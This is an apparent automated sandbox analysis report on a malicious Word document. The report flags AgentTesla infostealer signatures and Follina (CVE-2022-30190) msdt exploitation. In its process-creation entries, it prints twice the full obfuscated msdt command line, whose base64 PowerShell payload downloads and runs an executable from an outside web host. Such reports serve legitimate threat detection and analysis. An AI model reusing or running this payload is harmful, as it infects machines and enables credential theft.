                Source: 19.2.PMoZbw.exe.3ee9510.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 19.2.PMoZbw.exe.3ee9510.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
                Source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
                Source: Process Memory Space: msdt.exe PID: 4760, type: MEMORYSTRMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
                Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: PROMZwFp385vXrN.exe PID: 1788, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: DiagPackage.dll.mui.4.drStatic PE information: No import functions for PE file found
                Source: DiagPackage.dll.4.drStatic PE information: No import functions for PE file found
                Source: PMoZbw.exe.17.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Payment copy_2911022.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Payment copy_2911022.docx.doc
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@18/35@9/3
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: Payment copy_2911022.docx.docReversingLabs: Detection: 41%
                Source: Payment copy_2911022.docx.docVirustotal: Detection: 46%
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe "C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe"
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe "C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe"
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeProcess created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}
                Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E888FDBC-8FC8-436F-BA76-B0281CF96291} - OProcSessId.datJump to behavior
                Source: PROMZwFp385vXrN.exe, 00000011.00000002.628741170.000000000332D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.csCryptographic APIs: 'CreateDecryptor'
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeAutomated click: Next
                Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: Payment copy_2911022.docx.docInitial sample: OLE zip file path = word/media/image1.jpg
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: Binary string: oI4HW.pdbh' source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr
                Source: Binary string: oI4HW.pdb source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr

                Data Obfuscation

                barindex
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B75532 push eax; retf
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_05B75510 push eax; retf
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C350C8 push eax; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C3510C push eax; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C33A95 push ds; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C363A7 pushad ; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C363AC push 0000005Eh; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C33B03 push ds; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C33C3F push ds; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C31784 push cs; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 15_2_08C31773 push ss; ret
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061B5CA0 push eax; iretd
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_061BB118 push 8B000005h; retf
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 17_2_06D32A47 push edi; retn 0000h
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
                Source: initial sampleStatic PE information: section name: .text entropy: 7.701152052416849
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.csHigh entropy of concatenated method names: '.cctor', 'Fu1FU4djqmDhg', 'Cacv1IYjpG', 'piXvti4wNQ', 'ALkvTlQ60P', 'YiLvlhqNFg', 'oLOv4DvLPW', 'hyVvrqLIei', 'qLRvHyC17x', 'rHLveynBi1'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/Cw4NSQLaXXyjEwpvW5.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'mR5VmGhHHq', 'QRHMvpmWJv', 'TYJMdNpog7', 'DHtMNxute0', 'UrVMZyjCGr', 'vRLT5Ab4qZ', 'YdMTmyldP0', 'Vy7TBo44IP'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/SX6X9GsWYPpTlZmGHE.csHigh entropy of concatenated method names: '.ctor', 'aCNjrFil56', 'd81jHVjvyJ', 'pA6jeOASuE', 'UFZjCw2hYN', 'd3KjpZKaPW', 'yrbjnApmgm', 'rJ4jfO2hmo', 'ngPjoEK9JT', 'Dispose'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/WpJYxadxdWxBbWQwdk.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'fLhTAnBkWp', 'qR2TnjiE19', 'r0tTsW9pTS', 'qCHTqfDVUd', 'nlETglxBig', 'n8rTkNNA44', 'Q96T4xOXwW', 'gDmTckoq9m'
                Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/CjIWH3vxc1xKvslLRt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'fLhTAnBkWp', 'qR2TnjiE19', 'V3hTeRcjrJ', 'hjATuyniQy', 'r0tTsW9pTS', 'qCHTqfDVUd', 'nlETglxBig', 'n8rTkNNA44'
